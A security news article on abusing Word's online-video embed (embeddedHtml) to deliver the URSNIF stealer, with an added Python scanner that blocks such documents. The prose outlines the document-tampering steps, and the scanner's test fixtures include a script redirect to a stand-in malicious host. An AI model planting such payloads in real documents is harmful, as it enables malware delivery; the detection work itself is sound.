Security firm Trend Micro has found what it calls an “in-the-wild sample” on VirusTotal that delivers information-stealing malware. The sample follows Cymulate’s disclosure of a proof of concept (PoC) that exploits a logic flaw to let attackers “abuse the online video feature of Microsoft Office.”
Microsoft Office lets a user embed an online video from a supported website inside a Word document. The embed is stored as plain XML inside the document, and the PoC exploits what Cymulate calls a “logical bug”: edit that XML and Word honours the modified embed, so the video frame carries whatever the attacker put there.
Cymulate, a SaaS-based cyber-attack simulation company, explained how the attack is carried out against Microsoft Office 2013 and later. First, the attacker treats the .docx as what it is, a ZIP archive, and extracts it. Next, the attacker locates the embeddedHtml parameter inside the extracted XML (word/document.xml), which holds the HTML rendered in the video frame. The attacker then replaces that HTML with a malicious script or URL and repacks the document; when a victim clicks anywhere on the video frame, the user is automatically redirected to the specified URL. Once the script inside embeddedHtml has been modified, the payload is delivered: in the sample Trend Micro found, a variant of the URSNIF information stealer is downloaded when the user reaches the malicious URL.
Trend Micro explained that the PoC, by contrast, carries its payload inside the document and uses code in the video frame “to decode a base64-encoded binary embedded within the video tag. It is also triggered by clicking the video frame. Once decoded, it will prompt the user with Internet Explorer Download Manager with a notification asking whether to run or manually save the executable.”
The in-the-wild sample is considered more effective because it is simpler: it needs nothing more than a malicious URL. The malicious script placed in the file points to that URL, and when the user clicks anywhere in the video frame the final payload is downloaded automatically.
According to Trend Micro’s blog, Microsoft did not assign “a CVE identifier for this as the online video embedding feature is working as intended/designed.”
As for mitigation, Trend Micro suggested that organizations block Word documents whose XML contains an embeddedHtml parameter, or simply disable documents with embedded video.
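The following scanner is an added example, not code from Cymulate or Trend Micro. It implements the blocking advice above by doing exactly what the attack does in reverse: open the .docx as a ZIP, parse its XML parts, and pull out every embeddedHtml value. It then applies either the strict policy (block any document with an online video) or an allowlist policy that keeps known video hosts but blocks scripts, inline event handlers, base64 payloads and unexpected URLs. The sample documents are constructed in memory; the wp15:webVideoPr element name and the minimal package layout are assumptions (the scanner keys only on the embeddedHtml attribute name, so the element name does not matter), and the host names in the samples are placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from html import escape

# Constructed minimal .docx package: a real document has many more parts,
# but a ZIP with [Content_Types].xml and word/document.xml is enough to
# show where the online-video HTML lives. Element name wp15:webVideoPr is
# assumed; Word stores the frame HTML XML-escaped in the embeddedHtml
# attribute, which is what ElementTree decodes back for us.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.'
    'openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>'
)
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
    'xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing">'
    '<w:body>{body}</w:body></w:document>'
)

# Constructed embeddedHtml values (placeholder video ID and hosts).
BENIGN_VIDEO = ('<iframe width="640" height="360" src="https://www.youtube.com/embed/VIDEO_ID" '
                'frameborder="0" allowfullscreen></iframe>')
SCRIPT_VIDEO = (BENIGN_VIDEO +
                '<script>window.location="https://malicious.example/payload"</script>')
OFFHOST_VIDEO = '<iframe src="https://malicious.example/drop"></iframe>'


def build_docx(embedded_html=None):
    """Build a constructed .docx; with embedded_html it carries an online video."""
    if embedded_html is None:
        body = '<w:p/>'
    else:
        body = ('<w:p><w:r><w:drawing><wp15:webVideoPr embeddedHtml="%s" '
                'h="360" w="640"/></w:drawing></w:r></w:p>'
                % escape(embedded_html, quote=True))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("word/document.xml", DOCUMENT_XML.format(body=body))
    return buf.getvalue()


def extract_embedded_html(docx_bytes):
    """Return [(part_name, html)] for every embeddedHtml attribute in any XML part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".xml"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # damaged part: a stricter policy could block on this
            for elem in root.iter():
                for attr, value in elem.attrib.items():
                    # strip any {namespace} prefix before comparing the local name
                    if attr.rsplit("}", 1)[-1].lower() == "embeddedhtml":
                        findings.append((name, value))
    return findings


# Markers of active content inside the frame HTML (heuristic, not exhaustive).
SUSPICIOUS = re.compile(r"<script\b|javascript:|\batob\(|data:[^;\"']+;base64|\son\w+\s*=", re.I)
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def verdict(docx_bytes, allowed_hosts=None):
    """'allow' or 'block'. allowed_hosts=None is the strict policy: block any online video."""
    findings = extract_embedded_html(docx_bytes)
    if not findings:
        return "allow"
    if allowed_hosts is None:
        return "block"
    allowed = {h.lower() for h in allowed_hosts}
    for _, html in findings:
        if SUSPICIOUS.search(html):
            return "block"
        hosts = {h.lower() for h in HOST.findall(html)}
        if not hosts or not hosts <= allowed:
            return "block"
    return "allow"


if __name__ == "__main__":
    policy = {"www.youtube.com"}
    for label, doc in (("no video", build_docx()), ("youtube", build_docx(BENIGN_VIDEO)),
                       ("script", build_docx(SCRIPT_VIDEO)), ("off-host", build_docx(OFFHOST_VIDEO))):
        print(f"{label:9} strict={verdict(doc):5} allowlist={verdict(doc, policy)}")
```

The strict policy is the one Trend Micro describes and is the safer default for mail gateways; the allowlist variant is for environments that genuinely use embedded YouTube video and cannot block the feature outright. Either way the check is cheap, because it never has to render the document: the attacker-controlled HTML is sitting in the ZIP as text.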
“Given how this seemingly new technique only needs to modify URLs, it could expose users and businesses to various malware and other threats. Adopt best practices: be more cautious against unsolicited emails and update systems, applications, and networks to patch exploitable vulnerabilities. Employing security mechanisms that can provide additional layers of security to endpoints (such as URL filtering/categorization) can also help block malicious URLs and malware,” Trend Micro added.